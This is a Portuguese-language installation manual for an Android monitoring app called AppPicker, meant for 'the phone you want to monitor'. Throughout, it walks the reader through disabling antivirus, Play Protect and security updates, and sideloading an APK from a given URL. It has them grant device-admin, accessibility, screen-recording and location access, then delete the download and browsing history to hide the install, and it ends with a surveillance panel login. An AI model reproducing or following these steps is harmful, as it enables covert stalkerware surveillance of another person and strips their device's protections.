### Manual de instalação

- 01 Desativar e Desinstalar Antivírus (Caso o Aparelho possua)
- 02 Desativa o Google protect e as atualizações automáticas.

### Desativar o Google Play Protect.

- 1. Menus
- 2. Play Store
- 3. Canto superior esquerdo clique nos "3 pontinhos"
- 4. Google Play Protect
- 5. Engrenagem canto superior direito

### 03- Desativar as atualizações automáticas

- 1. Configurações
- 2. Segurança
- 3. Outras Configurações de Segurança
- 4. Atualizações de Política de Segurança
- 5. Atualizações Automáticas

### 04- Preparando o celular para instalação:

Na tela do celular clique em Configurações > Segurança > e ATIVE a chave "Fontes desconhecidas".

Não achou? Então tente outro caminho, Configurações > Aplicações >" Fontes desconhecidas" e **ATIVE** apenas isso.

Obs.: Em alguns telefones não terá o menu Configurações, nesse caso o nome Será ajustes.

### 05- BAIXANDO O APLICATIVO:

Abra a internet do celular que você quer monitorar digite o endereço o arquivo Será baixado.

## http://implite.com/appp13.apk

Aguarde e Pronto! O aplicativo foi baixado com sucesso. Dentro do aplicativo (O app levará você até a configuração necessária)

### 06- INSTALANDO O APLICATIVO

Abra o arquivo baixado na aba superior ou vá até a pasta de Downloads de 02 cliques no **APP** para iniciar a instalação,

Clique em '**Próximo** até surgir à opção '**Instalar** 'O aplicativo será instalado >abrira uma janela Clique em ver detalhes (**V**) clique em instala assim mesmo. Logo em seguida clique em '**Abrir** '.

Accept terms = Aceite todos os termos caso deseje continuar,

Device admin = Ativar o app de administrador deste dispositivo,

Allow permissions = Permitir todas as opções,

Allow Accessibility = Procure o nome AppPicker você precisa Habilitar 'o serviço (basta mudar a posição da chave no canto superior direito para habilitar)depois volte 2 etapas, Use o botão físico do aparelho na parte inferior para voltar ao aplicativo.

**Stop Battery optimization** = clique em PERMITIR.

**Enable Pictures** = Ache a palavra **AppPicker** você precisa Habilitar 'o serviço (Basta mudar a posição da chave no canto superior direito para habilitar) depois Volte 2 etapas, Use o botão físico do aparelho na parte inferior para voltar ao aplicativo.

**Enable Screen Recording** = Marque a caixa e clique em > **INICIA AGORA** Clique em **DONE** para prosseguir com a instalação.

Agora você vai **digita o seu E-MAIL valido** idêntico nos dois campos, pois é nele que você recebera uma senha de acesso ao painel de monitoramento e no campo

Access CODE digite a chave 8916 para ter a permissão da instalação.

Clique em '**Registrar** 'e aguarde a tela de 'Status do Dispositivo' carregar.

Agora você deve **ATIVAR OPÃO DE LOCALIZAÇÃO** do celular para que você tenha a posição dele em tempo real no painel – encontre no celular a opção configurações do Google e clique nela – agora clique em Localização – atenção caso esteja desativada a opção de Localização você deve **ATIVAR**.

### 07 - Excluir Histórico de downloads e Histórico de navegação

- 1. Abra o Google Chrome, - 2. No canto superior direito da tela clique nos "3 pontinhos" - 3. Selecione Histórico ou Downloads Após finalizar tudo aguarde e acesse seu e-mail para obter a senha de acesso ao painel

. Verifique na caixa de entrada ou na pasta de span.

# **VOCÊ TERA 02 DIAS GRATUITO PARA TESTE**

### Local do monitoramento

http://panel.app-picker.com/auth/login